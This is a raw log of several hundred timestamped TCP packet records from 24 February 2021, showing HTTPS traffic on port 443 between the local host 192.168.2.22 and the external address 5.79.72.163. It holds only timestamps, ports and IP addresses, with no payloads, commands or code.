Feb 24, 2021 12:53:28.117377996 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.122252941 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.122272968 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.122375965 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.122419119 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.122446060 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.122462034 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.122468948 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.122477055 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.122493982 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.122514963 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.122523069 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.122540951 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.122570992 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.122575045 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.122603893 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.122605085 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.122623920 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.122648001 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.122648001 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.122657061 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.122684002 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.122687101 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.122705936 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.122720003 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.122725010 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.122740984 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.122745991 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.122751951 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.122767925 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.122786045 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.122797966 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.122801065 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.122831106 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.122838974 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.122855902 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.122868061 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.122876883 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.122895956 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.122904062 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.122908115 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.122927904 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.122946024 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.122956038 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.122957945 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.122977018 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.122992992 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.122996092 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.123004913 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.123017073 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.123020887 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.123054981 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.123085022 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.123100042 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.123125076 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.123131990 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.123183012 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.123204947 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.123219967 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.123224020 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.123233080 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.123245955 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.123260021 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.123265982 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.123271942 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.123287916 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.123307943 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.123322964 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.123337030 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.123356104 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.123374939 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.123383999 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.123550892 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.123577118 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.123589993 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.123615980 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.123620033 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.123646975 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.123656988 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.123672009 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.123684883 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.123702049 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.123708010 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.123724937 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.123739958 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.123750925 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.123769045 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.123789072 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.123806953 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.123806953 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.123816013 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.123828888 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.123843908 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.123848915 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.123858929 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.123871088 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.123886108 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.123892069 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.123910904 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.123913050 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.123927116 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.123938084 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.123944044 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.123975039 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.123976946 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.123995066 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.124012947 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.124016047 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.124023914 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.124038935 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.124054909 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.124058962 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.124068022 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.124088049 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.124095917 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.124113083 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.124125957 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.124140978 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.124149084 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.124171019 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.124178886 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.124202967 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.124211073 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.124227047 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.124241114 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.124252081 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.124253988 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.124281883 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.124290943 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.124305010 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.124319077 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.124327898 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.124341011 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.124350071 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.124355078 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.124387026 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.130409002 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.136791945 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.136831045 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.136848927 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.136866093 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.136883020 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.136909962 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.136925936 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.136933088 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.136935949 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.136957884 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.136961937 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.136970043 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.136992931 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.137003899 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.137015104 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.137041092 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.137052059 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.137054920 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.137080908 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.137095928 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.137099028 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.137115002 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.137130976 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.137145042 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.137176991 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.137187958 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.137208939 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.137222052 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.137231112 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.137250900 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.137267113 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.137268066 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.137286901 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.137306929 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.137310028 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.137322903 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.137330055 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.137341976 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.137351990 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.137361050 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.137377024 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.137396097 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.137411118 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.137413025 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.137433052 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.137454987 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.137473106 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.137475967 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.137489080 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.137497902 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.137507915 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.137523890 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.137543917 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.137559891 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.137820005 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.137865067 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.137967110 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.138012886 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.138206959 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.138236046 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.138256073 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.138257027 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.138276100 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.138278008 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.138295889 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.138307095 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.138318062 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.138329029 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.138339043 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.138375998 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.138605118 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.138626099 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.138660908 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.138683081 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.138701916 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.138721943 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.138746023 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.138755083 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.138768911 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.138777018 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.138792038 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.138801098 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.138816118 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.138834953 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.138864994 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.143727064 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.145196915 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.145319939 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.145458937 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.145514011 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.145514965 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.145535946 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.145561934 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.145584106 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.145587921 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.145625114 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.145642042 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.145657063 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.145664930 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.145682096 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.145704031 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.145720005 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.145730019 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.145783901 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.145819902 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.145853043 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.145869017 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.145878077 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.145889044 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.145905018 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.145911932 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.145955086 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.145977974 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.146001101 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.146020889 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.146027088 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.146049023 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.146054029 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.146065950 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.146083117 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.146090031 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.146123886 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.146198988 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.146238089 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.146249056 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.146260977 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.146269083 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.146306038 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.146315098 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.146358013 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.146364927 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.146378994 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.146400928 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.146406889 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.146425009 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.146429062 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.146452904 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.146469116 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.146696091 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.146754980 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.146811008 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.146835089 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.146864891 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.146879911 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.146908998 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.146934986 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.146960020 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.146970987 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.146975040 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.147017002 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.147021055 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.147052050 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.147074938 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.147092104 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.147154093 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.147178888 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.147198915 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.147201061 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.147222996 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.147243023 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.152349949 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.152374983 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.152405977 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.152426958 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.152509928 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.152676105 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.152697086 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.152740955 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.152745008 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.152798891 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.152849913 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.152870893 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.152894020 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.152909040 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.152915955 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.152937889 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.152961969 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.153194904 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.153223038 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.153254032 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.153256893 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.153279066 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.153280020 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.153302908 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.153306007 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.153323889 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.153332949 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.153347969 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.153362036 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.153400898 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.153676033 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.153742075 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.154192924 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.154221058 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.154242039 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.154256105 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.154263020 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.154283047 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.154284000 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.154304981 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.154308081 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:28.154326916 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:28.154335976 CET	49166	443	192.168.2.22	5.79.72.163
